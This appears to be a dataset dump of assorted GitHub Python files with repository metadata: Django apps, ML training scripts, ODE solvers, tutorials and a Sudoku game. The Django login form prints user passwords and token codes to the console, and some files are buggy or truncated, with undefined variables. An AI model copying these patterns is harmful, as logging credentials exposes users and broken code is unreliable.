blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fbf8c0eedc51f3af0036528997de11c2f317912a | aac6a135e4ca83ffa5f9d6bf2f34ec4810aab114 | /account/migrations/0016_auto_20210528_1505.py | 4f2440357ba740cb9f3e06792638a0fe9bad0648 | [] | no_license | Achraf-Razzouqi/App-E-bank | fe76d9cf5f11a1afb740341ec604871526b5b489 | 64e5c531ba7b728fa239beca0ad2b7763f3d5a54 | refs/heads/main | 2023-05-13T09:54:58.804394 | 2021-06-05T00:45:03 | 2021-06-05T00:45:03 | 373,988,568 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,034 | py | # Generated by Django 3.2.2 on 2021-05-28 14:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('account', '0015_auto_20210528_1449'),
]
operations = [
migrations.CreateModel(
name='Conseille',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nom', models.CharField(max_length=50, null=True)),
('prenom', models.CharField(max_length=50, null=True)),
('cne', models.CharField(max_length=50, null=True, unique=True)),
('phone', models.CharField(max_length=50, null=True, unique=True)),
],
),
migrations.AddField(
model_name='use',
name='idC',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='idC', to='account.conseille'),
),
]
| [
"46264662+Achraf-Razzouqi@users.noreply.github.com"
] | 46264662+Achraf-Razzouqi@users.noreply.github.com |
ef78bf7f443635496ae6e3e1f78a094d28cd23ea | 6ffc82647c630839f2bbdc0321dcaffc9eda1f34 | /stock_transation_program.py | 979ba5d11acf25dced8dcbd8728563cd39e8a0fb | [] | no_license | satheeshkumars/my_chapter_2_solution_gaddis_book_python | 584cab0c6ba9c8c4ff7a5a2947cdba53f1b943e6 | 64d919fd1f70bcff91cc5cd47420870a68e59106 | refs/heads/master | 2022-02-26T20:43:23.183785 | 2019-10-10T20:59:40 | 2019-10-10T20:59:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 727 | py | SHARES_BOUGHT = 2000
COST_BOUGHT = 40
COMMISSION = 0.03
commission_on_buy = COMMISSION * (COST_BOUGHT * SHARES_BOUGHT)
SHARES_SOLD = 2000
COST_SOLD = 42.75
commission_on_sale = COMMISSION * (SHARES_SOLD * COST_SOLD)
paid = COST_BOUGHT * SHARES_BOUGHT
print('The amount Joe paid for the stock is $', paid)
print('The amount of commission Joe paid his broker when he bought the stock is $', commission_on_buy)
sold = SHARES_SOLD * COST_SOLD
print('The amount Joe sold the stock is $', sold)
print('The amount of commission Joe paid his broker when he sold the stock is $', commission_on_sale)
amount_left = (sold - commission_on_sale) - (paid + commission_on_buy)
print('Joe has $', amount_left, ' left.', sep = '') | [
"noreply@github.com"
] | satheeshkumars.noreply@github.com |
151c1e40e57679713ceedce80cba0891924d7705 | 7eec7ff6a6eebb7cd912159b94c583850b37a015 | /C3PO/Models/Embedding.py | 7a4ea1f9af740970ec8edfb1acac45b94728ad11 | [
"MIT"
] | permissive | tech-srl/c3po | 6dcf0ccc47643c04cc7488699d10b8209c8e17d3 | ce1e002bf9d026c10fbd2c178d454ebb76cb7a94 | refs/heads/master | 2023-05-01T06:23:15.860922 | 2021-05-21T07:18:23 | 2021-05-21T07:18:23 | 296,620,657 | 25 | 7 | null | null | null | null | UTF-8 | Python | false | false | 300 | py | import torch.nn as nn
class Embedding(nn.Module):
def __init__(self, vocab_size, h_dim, padding_idx=0):
super(Embedding, self).__init__()
self.emb = nn.Embedding(vocab_size, h_dim, padding_idx=padding_idx)
def forward(self, inputs):
return self.emb(inputs.long())
| [
"shaked@gmail.com"
] | shaked@gmail.com |
249ddc324320ba1c1f378517052d7ce9b068573b | f663790145e8e286b117ef639b626b492ae9f57a | /device/solver.py | 1b0a1a1d693fcb1b7912d291075ced729c548945 | [
"MIT"
] | permissive | longyangking/Device | 354d1261c094e367e59b67253781ac4cc496f91b | b8cf9fce5a8921dea179b0bb5a58a1a70dfb8f08 | refs/heads/master | 2021-01-17T00:38:53.101151 | 2018-06-02T11:55:53 | 2018-06-02T11:55:53 | 63,251,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,278 | py | import numpy as np
from scipy.integrate import ode
from scipy.integrate import odeint
class SymplecticSolver:
'''
Simulation for molecular dynamic system
'''
def __init__(self, nvars, A, B, init_state, order=2):
'''
A(state, t): Knetic function
B(state, t): Potential function
'''
self.init_state = init_state
self.A = A
self.B = B
self.t = None
self.order = 2
def init(self, init_state=None):
if init_state is None:
p,q = self.init_state
else:
p,q = init_state
self.p, self.q = p, q
self._p, self._q = p, q
self.t = None
return True
def update(self, dt):
if self.order == 2:
_p, _q = self.p, self.q
self.p = self._p + 0.5*self.A([p,q],self.t)*dt
self.q = self._q + self.B([p,q],self.t)*dt
self.p = self.p + 0.5*self.A([p,q],self.t)*dt
self._p, self._q = _p, _q
if self.order == 3:
# TODO order 3
pass
def evaluate(self, timesteps):
n_values = len(timesteps)
values = list()
values.append([self.p, self.q])
self.t = timesteps[0]
for i in range(1, n_values):
dt = timesteps[i] - timesteps[i-1]
self.update(dt)
value = [self.p, self.q]
values.append(value)
return values
class ODE:
'''
Simulation for real/complex-valued ODE
dy/dt = f(y,t0)
'''
def __init__(self,fun,y0,t0=0,jac=None,iscomplex=True,method='bdf'):
self.fun = fun
self.jac = jac
self.y0 = y0
self.t0 = t0
self.method = method
self.iscomplex = iscomplex
self.system = None
def set_method(self,method,iscomplex=True):
methods = ['bdf','adams']
if method not in methods:
return False
self.iscomplex = iscomplex
self.method = method
return True
def set_fun(self,fun):
self.fun = fun
def set_jacobian(self,jac):
self.jac = jac
def set_initial_value(self,y0,t0):
self.y0 = y0
self.t0 = t0
def init(self):
self.system = ode(self.fun,self.jac)
# set integrator
code = 'vode'
if self.iscomplex:
code = 'zvode'
self.system.set_integrator(code, method=self.method)
self.system.set_initial_value(self.y0,self.t0)
return self.system.successful()
def evaluate(self,timesteps,step=False,relax=False):
n_values = len(timesteps)
values = list()
status = True
for i in range(n_values):
t = timesteps[i]
status = status and self.init()
value = self.system.integrate(t,step,relax)
values.append(value)
return status, values
def get_time(self):
return self.system.t
class FastODE:
'''
Fast simulation, only for real-valued ODE
'''
def __init__(self,fun,y0):
self.fun = fun
self.y0 = y0
self.system = None
def set_fun(self,fun):
self.fun = fun
def set_initial_value(self,y0):
self.y0 = y0
def init(self):
# Nothing, just for uniform call process like simulation class
return True
def evaluate(self,ts):
solution = odeint(func=self.fun,y0=self.y0,t=ts)
return solution
if __name__=='__main__':
# Test simulation class
print('Inner test: ODE')
y0, t0 = [1.0j, 2.0], 0
def fun(t,y):
return [1j*2*y[0] + y[1], -2*y[1]**2]
sim = ODE(fun=fun,y0=y0,t0=t0)
print('ODE status: ',sim.init())
# Test fastsimulation class
print('Inner test: Fast ODE')
def fun(y, t):
theta, omega = y
dydt = [omega, -0.25*omega - 5.0*np.sin(theta)]
return dydt
y0 = [np.pi-0.1,0.0]
ts = np.linspace(0,10,101)
sim = FastODE(fun=fun,y0=y0)
print('Fast ODE status: ',sim.init())
sol = sim.evaluate(ts)
import matplotlib.pyplot as plt
plt.plot(ts, sol[:, 0], 'b', label='theta(t)')
plt.plot(ts, sol[:, 1], 'g', label='omega(t)')
plt.legend(loc='best')
plt.xlabel('t')
plt.show() | [
"longyang_123@yeah.net"
] | longyang_123@yeah.net |
10f288b55b2a6fd86e11600f7f41db43dff2e0c0 | 12cbd2ea83a67f4edce2d31cd337455a6d53d86e | /coding_challenge/apps.py | 713c6aac62ecb740465fdc322287013601d45baa | [] | no_license | shols232/coding | c3b6e1d3610a16ea32ea5ab1a35ed943a05268f5 | 260f44fa2c4caa8f97af33fed231f413a9f71bd0 | refs/heads/master | 2023-08-17T15:43:41.754370 | 2020-06-23T10:53:20 | 2020-06-23T10:53:20 | 274,131,496 | 1 | 3 | null | 2021-09-22T19:17:54 | 2020-06-22T12:31:37 | Python | UTF-8 | Python | false | false | 106 | py | from django.apps import AppConfig
class CodingChallengeConfig(AppConfig):
name = 'coding_challenge'
| [
"akinsolaademolatemitope@gmail.com"
] | akinsolaademolatemitope@gmail.com |
bc6c82fb55445d9be7ff31521c860701bb0ad7c2 | 064795929a2c14642198a496198427262b680455 | /page5.py | c143334c0887539952d0d9f36f7486bca81779b1 | [] | no_license | rajurana20/pythonAtRevature | 98882415c82acfc98149e3835df41cf1730d98eb | afb1bbbbc4503b9ab9dbb409418242b9f6bbdd73 | refs/heads/master | 2023-03-20T21:28:46.194100 | 2021-03-18T12:24:16 | 2021-03-18T12:24:16 | 348,841,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,020 | py | #classes
# Multiple classes can be placed in a single file. Classes are placed in multiple files if code becomes very big and need to put the critical parts of the code into multiple files, to make it easily accessible by other team programmers.
# Can multiple object be created from the same class?
# Yes, multiple objects can be created
# Can objects create classes?
# A Class is like an object constructor, or a "blueprint" for creating objects.
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
def myGreeting(self):
print("Hello my name is " + self.name)
# use setter and getter to implement data hiding
p1 = Person("Jake", 36)
p1.myGreeting()
# Module ------------------------------------------
import math
a = math.pi / 6
# returning the value of sine of pi / 6
print ("The value of sine of pi / 6 is : ", end ="")
print (math.sin(a))
# multiple inheritance
class Class1:
def m(self):
print("Called function in Class1")
class Class2(Class1):
def m(self):
print("Called function in Class2")
class Class3(Class1):
def m(self):
print("Called function in Class3")
class Class4(Class2, Class3):
def m(self):
print("Called function in Class4")
obj = Class4()
obj.m()
Class2.m(obj)
Class3.m(obj)
Class1.m(obj)
# A static method
# called without an object but cannot be utilized in collections
class C:
@staticmethod
def f(arg1, arg2):
print("The values are", arg1, arg2)
C.f(3,4)
# iterable data type can be lists, tuples, dictionaries and sets
mytuple = ("toyota", "nissan", "honda")
myit = iter(mytuple)
print(next(myit))
print(next(myit))
print(next(myit))
# With class method
class MyClass:
@classmethod
def classmethod(cls):
return 'class method called', cls
@staticmethod
def staticmethod():
return 'static method called'
print(MyClass.classmethod())
print(MyClass.staticmethod())
| [
"ranaraju315@gmail.com"
] | ranaraju315@gmail.com |
b11bcf301a395e9e6b46a09ceae1bcccb5a064bf | 4e8664bcd1e11be648a7f81d1563009273c8e695 | /newsapp/newsapp/urls.py | c94badca8f557aee713272e59fed3a6c566eac74 | [] | no_license | NikhilB123/NetworkSecurityLab1 | b7021a43a6b901938a54c5a0e0e3a9a0e734e5f9 | 8d8bc1cea3056a87168dd5d19fbe5add39289f0f | refs/heads/master | 2022-12-21T20:39:38.733227 | 2020-09-27T20:13:54 | 2020-09-27T20:13:54 | 298,892,022 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,289 | py | """newsapp URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views as auth_views
from django.contrib.auth.forms import AuthenticationForm, UserCreationForm
from django import forms
from newslister.models import UserXtraAuth
from newslister.views import register_view, account
import fake_token
class TokenLoginForm(AuthenticationForm):
def clean(self):
# STUDENT TODO:
# This is where password processing takes place.
# For 2-factor authentication, you need to
# check that the token number is appended to
# the end of the password entered by the user
# You don't need to check the password; Django is
# doing that.
# testing1232
print("start")
user_password = self.cleaned_data['password']
if not UserXtraAuth.objects.filter(username=self.cleaned_data['username']).exists():
# User not found. Set secrecy to 0
user_secrecy = 0
else:
user_xtra_auth = UserXtraAuth.objects.get(username=self.cleaned_data['username'])
user_secrecy = user_xtra_auth.secrecy
if user_secrecy > 0:
print(user_xtra_auth.tokenkey)
token_key = user_xtra_auth.tokenkey.encode()
key = fake_token.FakeToken(token_key)
currentKey = next(key)[1]
cur_key_len = len(str(currentKey))
print(user_password)
print(type(user_password[len(user_password) - cur_key_len:]))
if user_password[len(user_password) - cur_key_len:].isnumeric() and int(user_password[len(user_password) - cur_key_len:]) == currentKey:
self.cleaned_data['password'] = user_password[0: len(user_password) - cur_key_len]
else:
raise forms.ValidationError("Invalid Token Code")
# the password in the form in self._cleaned_data['password']
print(self.cleaned_data['password'])
return super().clean()
urlpatterns = [
path('login/', auth_views.LoginView.as_view(
template_name="registration/login.html",
authentication_form=TokenLoginForm),
name='login'
),
path('logout/', auth_views.LogoutView.as_view(
template_name="registration/logout.html"),
name='logout'
),
path('register/', register_view,
name="register"),
path('admin/', admin.site.urls),
# This line will look for urls in app
path('',include('newslister.urls')),
path('newslist/',include('newslister.urls')),
path('account/',account, name="account")
]
| [
"nbodicha@gmail.com"
] | nbodicha@gmail.com |
c0c25b1d782fa904c2f82b0f8281c1d64826f289 | 47f3b32c01cd88cdbaa52b43ed8fe855a454d2d6 | /pandas_lib3.py | 8dea07c5497a2a740e598a0a75f02ac16d037c4c | [] | no_license | Mukesh80530/python_for_datascience | 34e68333a10d412659839331195ec897a7931c09 | f9366f0d23459b3fefb9f5b37d87b8824b10b850 | refs/heads/master | 2023-02-13T09:09:46.379871 | 2021-01-17T14:39:11 | 2021-01-17T14:39:11 | 330,195,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py | import pandas as pd
import numpy as np
cars_data = pd.read_csv('Toyota.csv', index_col=0, na_values=["??","????"])
# print(cars_data.info())
# cars_data['MetColor'] = cars_data['MetColor'].astype('object')
# cars_data['Automatic'] = cars_data['Automatic'].astype('object')
# print(cars_data.info())
# print(cars_data['FuelType'].nbytes)
# print(cars_data['FuelType'].astype('category').nbytes)
# print(np.unique(cars_data['Doors']))
# print(np.where(cars_data['Doors']))
# cars_data['Doors'].replace('three', 3, inplace=True)
# cars_data['Doors'].replace('four', 4, inplace=True)
# cars_data['Doors'].replace('five', 5, inplace=True)
# print(np.unique(cars_data['Doors']))
print(cars_data.isnull().sum()) | [
"mukeshgautam.er@gmail.com"
] | mukeshgautam.er@gmail.com |
f6cd3cd1c08de907d6dc8e70971624f5b8e0b4ef | 4b9bcf0576256238e91bc1fb99d12fca6fa84920 | /core/user/admin.py | 385e1a4f791a45027d8d255b90b7331139fa9787 | [] | no_license | kevinitsDevaluado/CursosOracle | 734c2dac77a96d2e1055efa357af6d072ceec511 | e227b211eaa36515b60361f97c616159abf9e65a | refs/heads/main | 2023-03-07T22:27:01.830666 | 2021-02-20T18:11:18 | 2021-02-20T18:11:18 | 340,718,244 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | from django.contrib import admin
# Register your models here.
from core.user.models import User
admin.site.register(User) | [
"kevin.alvarado8502@utc.edu.ec"
] | kevin.alvarado8502@utc.edu.ec |
98a2fbc4649d975e2d377fd1807563c36b2fd8ac | 01f8fc5229a538ed5b6787d469e25738c7f19d05 | /archive_model/HyperParameterTuning.py | a21a6db83648c946b0a9500afc63421c0837a0f0 | [] | no_license | nwihardjo/RL-Trading-Agent | 8f83360557a3427941ac4133d1d294eb3f7d492d | 3904505fb2d5d58f0466892e6f698d1ab6ea2bb5 | refs/heads/master | 2021-10-10T20:56:06.830894 | 2019-01-17T06:55:22 | 2019-01-17T06:55:22 | 161,769,473 | 25 | 12 | null | null | null | null | UTF-8 | Python | false | false | 7,375 | py | # -*- coding:utf-8 -*-
import os
import requests
import itertools
from utils.EnvironmentUtils import build_backtest_environment
from utils.DataUtils import *
import tensorflow as tf
from model_archive.DRL_Portfolio_Isolated_Simple import DRL_Portfolio
from env.zipline_env import AgentTrader
import pickle
start_date_str = '2005-02-08'
end_date_str = '2018-03-27'
bootstrap_length = 300
data, env, bundle, sim_params = build_backtest_environment(start_date_str, end_date_str)
# =========================================
# load security pool
if not os.path.exists('sp500.csv'):
print('downloading sp500 data')
with open('sp500.csv', 'wb+') as f:
response = requests.get('https://datahub.io/core/s-and-p-500-companies-financials/r/constituents-financials.csv')
f.write(response.content)
sp500 = pd.read_csv('sp500.csv')
sp500.index = sp500['Symbol']
high_cap_company = sp500.loc[list(itertools.chain.from_iterable(list(map(lambda x: x[1][:5], list(sp500.sort_values('Market Cap').groupby('Sector').groups.items())))))]
assets = list(high_cap_company.Symbol.values)
assets = retrieve_equitys(bundle, assets)
# =========================================
# prepare data
initial_history_start_date = bundle.equity_daily_bar_reader.sessions[bundle.equity_daily_bar_reader.sessions < start_date_str][(-bootstrap_length - 1)]
initial_history_end_date = bundle.equity_daily_bar_reader.sessions[bundle.equity_daily_bar_reader.sessions > start_date_str][0]
filtered_assets_index = (np.isnan(np.sum(bundle.equity_daily_bar_reader.load_raw_arrays(columns=['close'], start_date=initial_history_start_date, end_date=initial_history_end_date, assets=assets), axis=1)).flatten() == False)
assets = list(np.array(assets)[filtered_assets_index])
print(assets, len(assets))
remain_asset_names = list(map(lambda x: x.symbol, assets))
equity_data = prepare_equity_data(initial_history_start_date, remain_asset_names)
index_data = prepare_index_data(initial_history_start_date, equity_data.major_axis)
news_data = prepare_news_data(equity_data)
# The dictionary may change the order of assets, so we rebuild the assets list
assets = retrieve_equitys(bundle, list(equity_data.items))
remain_asset_names = list(map(lambda x: x.symbol, assets))
assert equity_data.major_axis[0] == index_data.major_axis[0]
# ==============================================================================
# Start the backtest
# Step 1. define the hyper-parameter combination
training_sequence_length = [30, 60, 100, 150, None]
taos = [1.0, 5.0]
attention_length = [5, 10]
network_plan = [
([128], [64]),
([256, 128], [64, 32]),
([512, 256, 128], [128, 64])
]
object_function = ['reward', 'sortino']
equity_network_template = {
'feature_map_number': len(assets),
'feature_number': equity_data.shape[2],
'input_name': 'equity',
'keep_output': True
}
index_network_template = {
'feature_map_number': len(index_data.items),
'feature_number': index_data.shape[2],
'input_name': 'index',
'keep_output': False
}
news_network_template = {
'feature_map_number': 1,
'feature_number': 100,
'input_name': 'news',
'keep_output': False
}
weight_network_template = {
'feature_map_number': 1,
'feature_number': len(assets) + 1,
'input_name': 'weight',
'keep_output': False
}
return_network_template = {
'feature_map_number': 1,
'feature_number': 1,
'input_name': 'return',
'keep_output': False
}
networks = {
'equity_network': equity_network_template,
'weight_network': weight_network_template,
'return_network': return_network_template,
'index_network': index_network_template,
'news_network': news_network_template
}
other_features = {
'index_network': {
'data': index_data,
'normalize': True
},
'news_network': {
'data': news_data,
'normalize': False
}
}
hyper_parameters = []
for d, r in network_plan:
for act in [tf.nn.relu, tf.nn.tanh]:
for attn in attention_length:
for tao in taos:
for sequence_length in training_sequence_length:
for o in object_function:
network_topology = {}
training_strategy = {
'training_data_length': sequence_length,
'tao': tao,
'short_term': {
'interval': 1,
'max_epoch': 1,
'keep_prob': 1.0
},
'long_term': {
'interval': 30,
'max_epoch': 10,
'keep_prob': 0.85,
}
}
for k, v in networks.items():
template = v
if k == 'equity_network':
template['dense'] = {
'n_units': d,
'act': [act] * len(d)
}
template['rnn'] = {
'n_units': r + [1],
'act': [act] * len(r) + [tf.nn.sigmoid],
'attention_length': attn
}
else:
template['dense'] = {
'n_units': d,
'act': [act] * len(d)
}
template['rnn'] = {
'n_units': r,
'act': [act] * len(r),
'attention_length': attn
}
network_topology[k] = template
hyper_parameters.append((network_topology, training_strategy, o))
if not os.path.exists('./experiment'):
os.mkdir('./experiment')
for i, h in enumerate(hyper_parameters):
result_dir = './experiment/result%d' % i
model_dir = result_dir + '/model_archive'
if not os.path.exists(result_dir):
os.mkdir(result_dir)
if not os.path.exists(model_dir):
os.mkdir(model_dir)
topology = h[0]
strategy = h[1]
o_function = h[2]
model = DRL_Portfolio(asset_number=len(assets), feature_network_topology=topology, object_function=o_function, learning_rate=0.001)
trader = AgentTrader(
model=model,
pre_defined_assets=assets,
equity_data=equity_data,
other_data=other_features,
training_strategy=strategy,
sim_params=sim_params,
pre_trained_model_path=None,
name='backtest_%d' % (i),
env=env
)
try:
with open(result_dir + '/hyper_parameter', 'wb+') as f:
pickle.dump({'topology': topology, 'strategy': strategy, 'object': o_function}, file=f)
trained_model, actions, result = trader.backtest(data)
trained_model.save_model(model_dir)
np.save(result_dir + '/action', actions)
result.to_pickle(result_dir + '/result')
except Exception as e:
print(e.message)
continue
| [
"wihardjo.nathaniel@gmail.com"
] | wihardjo.nathaniel@gmail.com |
a44780758c3ce69a3fe69ad94c7f73afc8dd16bd | c51ba90d26e8ee2bb91a98852bc7ee23fa7f4028 | /pytorch_code/main.py | f837062fa5ceb12c59c72218a17f162cffefcd77 | [] | no_license | liuzongzhou/GC-SAN | 3106f05d12e1421c3d4218f29c57624d480754a3 | 6231d3e1a7d4d169d599df71b74c9be91e4e1741 | refs/heads/master | 2023-06-10T02:59:13.666139 | 2021-07-01T09:17:25 | 2021-07-01T09:17:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,605 | py | #!/usr/bin/env python36
# -*- coding: utf-8 -*-
"""
Created on July, 2018
@author: Tangrizzly
"""
import argparse
import pickle
import time
from utils import build_graph, Data, split_validation
from model import *
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', default='diginetica', help='dataset name: diginetica/yoochoose1_4/yoochoose1_64/sample')
parser.add_argument('--batchSize', type=int, default=50, help='input batch size')
parser.add_argument('--hiddenSize', type=int, default=120, help='hidden state size')
parser.add_argument('--epoch', type=int, default=30, help='the number of epochs to train for')
parser.add_argument('--lr', type=float, default=0.001, help='learning rate') # [0.001, 0.0005, 0.0001]
parser.add_argument('--lr_dc', type=float, default=0.1, help='learning rate decay rate')
parser.add_argument('--lr_dc_step', type=int, default=3, help='the number of steps after which the learning rate decay')
parser.add_argument('--l2', type=float, default=1e-5, help='l2 penalty') # [0.001, 0.0005, 0.0001, 0.00005, 0.00001]
parser.add_argument('--step', type=int, default=1, help='gnn propogation steps')
parser.add_argument('--patience', type=int, default=10, help='the number of epoch to wait before early stop ')
parser.add_argument('--nonhybrid', action='store_true', help='only use the global preference to predict')
parser.add_argument('--validation', action='store_true', help='validation')
parser.add_argument('--valid_portion', type=float, default=0.1, help='split the portion of training set as validation set')
parser.add_argument('--dynamic', type=bool, default=False)
opt = parser.parse_args()
print(opt)
def main():
train_data = pickle.load(open('../datasets/' + opt.dataset + '/train.txt', 'rb'))
if opt.validation:
train_data, valid_data = split_validation(train_data, opt.valid_portion)
test_data = valid_data
else:
test_data = pickle.load(open('../datasets/' + opt.dataset + '/test.txt', 'rb'))
# all_train_seq = pickle.load(open('../datasets/' + opt.dataset + '/all_train_seq.txt', 'rb'))
# g = build_graph(all_train_seq)
train_data = Data(train_data, shuffle=True, opt=opt)
test_data = Data(test_data, shuffle=False, opt=opt)
# del all_train_seq, g
if opt.dataset == 'diginetica':
n_node = 43098
elif opt.dataset == 'yoochoose1_64' or opt.dataset == 'yoochoose1_4':
n_node = 37484
elif opt.dataset == 'diginetica_users':
n_node = 57070
else:
n_node = 310
model = trans_to_cuda(SessionGraph(opt, n_node, max(train_data.len_max, test_data.len_max)))
start = time.time()
best_result = [0, 0]
best_epoch = [0, 0]
bad_counter = 0
for epoch in range(opt.epoch):
print('-------------------------------------------------------')
print('epoch: ', epoch)
hit, mrr = train_test(model, train_data, test_data)
flag = 0
if hit >= best_result[0]:
best_result[0] = hit
best_epoch[0] = epoch
flag = 1
if mrr >= best_result[1]:
best_result[1] = mrr
best_epoch[1] = epoch
flag = 1
print('Best Result:')
print('\tRecall@20:\t%.4f\tMMR@20:\t%.4f\tEpoch:\t%d,\t%d'% (best_result[0], best_result[1], best_epoch[0], best_epoch[1]))
bad_counter += 1 - flag
if bad_counter >= opt.patience:
break
print('-------------------------------------------------------')
end = time.time()
print("Run time: %f s" % (end - start))
if __name__ == '__main__':
main()
| [
"johnny12150@gmail.com"
] | johnny12150@gmail.com |
45d28aa10f25871b33de9573c126392639152d09 | 847273de4b1d814fab8b19dc651c651c2d342ede | /.history/Sudoku_II_003_20180618133626.py | 749199c16ddebe39bbc973c2ba32a1bfd48fc600 | [] | no_license | Los4U/sudoku_in_python | 0ba55850afcffeac4170321651620f3c89448b45 | 7d470604962a43da3fc3e5edce6f718076197d32 | refs/heads/master | 2020-03-22T08:10:13.939424 | 2018-07-04T17:21:13 | 2018-07-04T17:21:13 | 139,749,483 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,849 | py | from random import randint
# Sudoku1 almost solved
sudoku1 = [
[5, 9, 8, 6, 1, 2, 3, 4, 7],
[2, 1, 7, 9, 3, 4, 8, 6, 5],
[6, 4, 3, 5, 8, 7, 1, 2, 9],
[1, 6, 5, 4, 9, 8, 2, 7, 3],
[3, 2, 9, 7, 6, 5, 4, 1, 8],
[7, 8, 4, 3, 2, 1, 5, 9, 6],
[8, 3, 1, 2, 7, 6, 9, 5, 4],
[4, 7, 2, 8, 5, 9, 6, 3, 1],
[9, 5, ' ', ' ', ' ', ' ', ' ', ' ', 2]
]
i = 0
while i < 10:
if i == 0:
print(" 1 2 3 4 5 6 7 8 9")
print(" -------------------------")
elif i == 3 or i == 6 or i == 9:
print(" -------------------------")
spaceBar = "|"
if i < 9:
print('{2} {1} {0[0]} {0[1]} {0[2]} {1} {0[3]} {0[4]} {0[5]} {1} {0[6]} {0[7]} {0[8]} {1}'.format(sudoku1[i], spaceBar,i+1))
i = i + 1
while True: # prints Sudoku until is solved
print("Input 3 numbers in format a b c, np. 4 5 8")
print(" a - row number")
print(" b - column number ")
print(" c - value")
#vprint(" r - reset chart to start\n ")
x = input("Input a b c: ")
print("")
numbers = " 0123456789" # conditions of entering the numbers !
if (len(x) != 5) or (str(x[0]) not in numbers) or (str(x[2]) not in numbers) or (
str(x[4]) not in numbers) or (str(x[1]) != " ") or (str(x[3]) != " "):
if x == "r": # reset
print(" Function reset() will be ready in Next Week")
else:
print("Error - wrong number format \n ")
continue
sudoku1[int(x[0])-1][int(x[2])-1] = x[4]
if int(x[0]) == 1:
row1[int(x[2]) - 1] = int(x[4])
elif int(x[0]) == 2:
row2[int(x[2]) - 1] = int(x[4])
elif int(x[0]) == 3:
row3[int(x[2]) - 1] = int(x[4])
elif int(x[0]) == 4:
row4[int(x[2]) - 1] = int(x[4])
elif int(x[0]) == 5:
row5[int(x[2]) - 1] = int(x[4])
elif int(x[0]) == 6:
row6[int(x[2]) - 1] = int(x[4])
elif int(x[0]) == 7:
row7[int(x[2]) - 1] = int(x[4])
elif int(x[0]) == 8:
row8[int(x[2]) - 1] = int(x[4])
elif int(x[0]) == 9:
row9[int(x[2]) - 1] = int(x[4])
# Sudoku 2 almost solved
# row1 = [9,8,7,4,3,2,5,6,1]
# row2 = [2,4,3,5,1,6,8,7,9]
# row3 = [5,6,1,7,9,8,4,3,2]
# row4 = [3,9,5,6,4,7,2,1,8]
# row5 = [8,2,4,3,5,1,6,9,7]
# row6 = [1,7,6,2,8,9,3,4,5]
# row7 = [7,1,2,8,6,3,9,5,4]
# row8 = [4,3,8,9,7,5,1,2,6]
# row9 = [' ',5,' ',' ',2,' ',7,' ',' ']
'''
columns = [1, 2, 3, 4, 5, 6, 7, 8, 9]
r1 = [[5, 9, 8, 6, 1, 2, 3, 4, 7], [9, 8, 7, 4, 3, 2, 5, 6, 1]]
r2 = [[2, 1, 7, 9, 3, 4, 8, 6, 5], [2, 4, 3, 5, 1, 6, 8, 7, 9]]
r3 = [[6, 4, 3, 5, 8, 7, 1, 2, 9], [5, 6, 1, 7, 9, 8, 4, 3, 2]]
r4 = [[1, 6, 5, 4, 9, 8, 2, 7, 3], [3, 9, 5, 6, 4, 7, 2, 1, 8]]
r5 = [[3, 2, 9, 7, 6, 5, 4, 1, 8], [8, 2, 4, 3, 5, 1, 6, 9, 7]]
r6 = [[7, 8, 4, 3, 2, 1, 5, 9, 6], [1, 7, 6, 2, 8, 9, 3, 4, 5]]
r7 = [[8, 3, 1, 2, 7, 6, 9, 5, 4], [7, 1, 2, 8, 6, 3, 9, 5, 4]]
r8 = [[4, 7, 2, 8, 5, 9, 6, 3, 1], [4, 3, 8, 9, 7, 5, 1, 2, 6]]
r9 = [[9, 5, ' ', ' ', ' ', ' ', ' ', ' ', 2], [6, 5, ' ', 1, ' ',
' ', 7, 8, ' ']] # 9 1 6, 9 3 9, 9 4 1, 9 6 4, 9 8 8, 9 9 3
# r9=[[9,5, ' ', ' ', ' ', ' ', ' ', ' ',2],[' ',5,' ',' ',2,' ',7,' ','
# ']] # 9 1 6, 9 3 9, 9 4 1, 9 6 4, 9 8 8, 9 9 3
print(" ")
print(" %@@@@@@@ @@@ @@@ (@@@@@@@@@ ,@@@@2@@@@@ @@@, /@@@/ @@@, @@@ ")
print(" @@@* @@@ @@@ (@@( /@@@# .@@@% (@@@ @@@, @@@% @@@, @@@. ")
